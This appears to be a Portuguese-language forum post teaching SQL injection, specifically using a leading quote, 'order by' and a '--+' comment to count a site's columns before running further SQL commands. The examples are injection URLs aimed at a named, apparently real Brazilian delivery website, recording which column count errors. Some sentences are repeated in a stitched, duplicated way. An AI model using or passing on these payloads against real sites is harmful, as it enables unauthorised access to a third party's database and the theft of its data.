Muitas vezes no sql injection na hora de saber o numero de colunas/tabelas
usando o comando order by , muitos sites você coloca order by 500
e ele ainda nao da erro , para fazer com que ele mostra resultados verdadeiros é presciso colocar uma aspa ' no começo e --+ no final
exemplo:
No exemplo acima o site carrega normal sem erro, agora observe no exemplo abaixo voce adicionando a aspa no começo eo --+ no final o site vai dar erro
no exemplo abaixo tentamos saber quantas colunas/tabelas o site tem
vejam , agora você pode executar os comandos sql
Espero que tenham entendido
Ate mais galera
usando o comando order by , muitos sites você coloca order by 500
e ele ainda nao da erro , para fazer com que ele mostra resultados verdadeiros é presciso colocar uma aspa ' no começo e --+ no final
exemplo:
Código:
http://www.aguanabocadelivery.com.br/produto.php?id=-340 order by 500
Código:
http://www.aguanabocadelivery.com.br/produto.php?id='-340 order by 500 --+
Código:
http://www.aguanabocadelivery.com.br/produto.php?id='-340 order by 11 --+ <-- sem erro
Código:
http://www.aguanabocadelivery.com.br/produto.php?id='-340 order by 12 --+ <-- com erro
Espero que tenham entendido
Ate mais galera
Comment